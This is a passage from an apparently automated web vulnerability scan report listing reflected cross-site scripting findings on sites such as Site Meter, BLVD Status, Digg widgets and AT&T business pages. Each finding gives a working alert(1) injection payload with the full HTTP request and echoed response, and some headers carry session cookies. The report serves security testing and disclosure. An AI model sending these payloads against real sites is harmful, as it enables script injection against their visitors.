Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:36 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s28japanator695f8';alert(1)//5ff8671c168', 's28.sitemeter.com', '');

var g_sLastCodeName = 's28japanator695f8';alert(1)//5ff8671c168';
// ]]>
...[SNIP]...

7.32. http://s28.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df6e'%3balert(1)//b8c17a2141b was submitted in the site parameter. This input was echoed as 3df6e';alert(1)//b8c17a2141b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s28japanator3df6e'%3balert(1)//b8c17a2141b HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:08 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s28japanator3df6e';alert(1)//b8c17a2141b', 's28.sitemeter.com', '');

var g_sLastCodeName = 's28japanator3df6e';alert(1)//b8c17a2141b';
// ]]>
...[SNIP]...

7.33. http://tomopop.com/index-ad-anime.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomopop.com
Path:   /index-ad-anime.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58591"><script>alert(1)</script>8ca5ec22d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index-ad-anime.phtml58591"><script>alert(1)</script>8ca5ec22d40 HTTP/1.1
Host: tomopop.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:04:07 GMT
Server: lighttpd/1.4.28
Content-Length: 305146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="http://tomopop.com/index-ad-anime.phtml58591"><script>alert(1)</script>8ca5ec22d40?start=10">
...[SNIP]...

7.34. http://track.blvdstatus.com/js/track.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /js/track.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5949b'%3balert(1)//02a670cbde0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5949b';alert(1)//02a670cbde0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/track.php?tid=BS-45e605/5949b'%3balert(1)//02a670cbde0ae-1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: track.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:54 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 8897

//-- BLVD Status tracker
//-- Copyright 2010 BLVD Status, All Rights Reserved.

//BLVD tracking object
function BLVD() {
   
//params
this.host = 'http://hit.blvdstatus.com';
this.tid = 'BS-45e605/5949b';alert(1)//02a670cbde0ae-1';

   //set cookie
var blvdCookie = this._Get_Cookie('blvdS');
if(blvdCookie) {
this._Set_Cookie('blvdS', blvdCookie, 30,'/');
} else {
blvdCookie = 's45e4dbe1bd2893c
...[SNIP]...

7.35. http://track.blvdstatus.com/js/track.php [tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /js/track.php

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb3ab'%3balert(1)//fe30191df11 was submitted in the tid parameter. This input was echoed as fb3ab';alert(1)//fe30191df11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/track.php?tid=BS-45e605ae-1fb3ab'%3balert(1)//fe30191df11 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: track.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 8896

//-- BLVD Status tracker
//-- Copyright 2010 BLVD Status, All Rights Reserved.

//BLVD tracking object
function BLVD() {
   
//params
this.host = 'http://hit.blvdstatus.com';
this.tid = 'BS-45e605ae-1fb3ab';alert(1)//fe30191df11';

   //set cookie
var blvdCookie = this._Get_Cookie('blvdS');
if(blvdCookie) {
this._Set_Cookie('blvdS', blvdCookie, 30,'/');
} else {
blvdCookie = 's45e4dbe1b907640c3.6
...[SNIP]...

7.36. http://usjobsresource.com/3 [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e48"><script>alert(1)</script>e6cfb5723ff was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /3?s=31s-2100u50e48"><script>alert(1)</script>e6cfb5723ff HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="sub_id" id="page_subid" value="31s-2100u50e48"><script>alert(1)</script>e6cfb5723ff" />
...[SNIP]...

7.37. http://usjobsresource.com/3/ [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32f1f"><script>alert(1)</script>6df8703c622 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3/?s=31s-2100u32f1f"><script>alert(1)</script>6df8703c622 HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="sub_id" id="page_subid" value="31s-2100u32f1f"><script>alert(1)</script>6df8703c622" />
...[SNIP]...

7.38. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 24218<script>alert(1)</script>e84fc8187f6 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html24218<script>alert(1)</script>e84fc8187f6 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: traffic_control=-781655937076164456%3A203; d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; imp_id=1f0886feeb8786a6bbd1a6e1e240cbe5d902a47b7a6b64c4656307739e35a482; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 01 May 2011 23:25:30 GMT
Via: NS-CACHE: 100
Etag: "600917dcebe2f17e666a47431399dbfb32a9afc9"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 01 May 2011 23:35:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html24218<script>alert(1)</script>e84fc8187f6", "diggs": 0});

7.39. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [GUID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of the GUID request parameter is copied into an HTML comment. The payload 3f483--><script>alert(1)</script>0979b4e1029 was submitted in the GUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C43523f483--><script>alert(1)</script>0979b4e1029&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:34:43 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:34:43 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=LPNFFQCT4WHVHB4U3SIB5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207601853; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=38f57a3139fe3100e934be119a8bde04; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.31
Via: 1.1 12.120.78.31:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
=ProductSub-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C43523f483--><script>alert(1)</script>0979b4e1029&WT.srch=1 -->
...[SNIP]...

7.40. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 283a6"><script>alert(1)</script>97891412ffe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security283a6"><script>alert(1)</script>97891412ffe/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:01:20 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:01:20 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=LZOJUPGBKPSHXB4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610536; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=ecd6ef2ba3674bc7ffa69ff03589f6ed; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.17
Via: 1.1 12.120.79.17:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<link rel="canonical" href="http://www.business.att.com/enterprise/Family/network-security283a6"><script>alert(1)</script>97891412ffe/threat-vulnerability-management/"/>
...[SNIP]...

7.41. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9cfc'-alert(1)-'062611d0003 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-securityb9cfc'-alert(1)-'062611d0003/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:02:29 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:02:29 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=ZIAJEFC04ES2VB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579685; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=2cfd5fa64eb3b601400f181ff3de6124; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.18
Via: 1.1 12.120.79.18:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<s'+'cript language="javascript" src="http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-securityb9cfc'-alert(1)-'062611d0003]">
...[SNIP]...

7.42. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69ba2"-alert(1)-"91dbea1c28a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security69ba2"-alert(1)-"91dbea1c28a/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:01:54 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:01:54 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=VYIV31SYKK2S1B4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610540; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=fc845523bb479e8fe404a8b911a72926; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.63
Via: 1.1 12.120.79.63:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
TTCampaign=EMPTY";
_cp_custom_array[n++]="ATTSource=null";
_cp_custom_array[n++]="ATTEBSegment=null";
_cp_custom_array[n++]="ATTECampaignID=null";
_cp_custom_array[n++]="ATTServicePort=network-security69ba2"-alert(1)-"91dbea1c28a";
_cp_custom_array[n++]="ATTCType=ProductSub-Category";
_cp_custom_array[n++]="ATTCValue=threat-vulnerability-management";
/** FR-ABS_0402 Remove Intellakey
_cp_cc='ATT';
_cp_pc='ATT101';
_cp_chc='ATT
...[SNIP]...

7.43. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [WT.srch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of the WT.srch request parameter is copied into an HTML comment. The payload d5e22--><script>alert(1)</script>9c70c127f7e was submitted in the WT.srch parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1d5e22--><script>alert(1)</script>9c70c127f7e HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:35:06 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:35:06 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=1YST0KTJBXSXPB4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610337; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=faa58d0946d2d8a634695d2e0591c56e; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.31
Via: 1.1 12.120.78.31:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
b-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1d5e22--><script>alert(1)</script>9c70c127f7e -->
...[SNIP]...

7.44. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4bdf4--><script>alert(1)</script>c023ff8d913 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1&4bdf4--><script>alert(1)</script>c023ff8d913=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
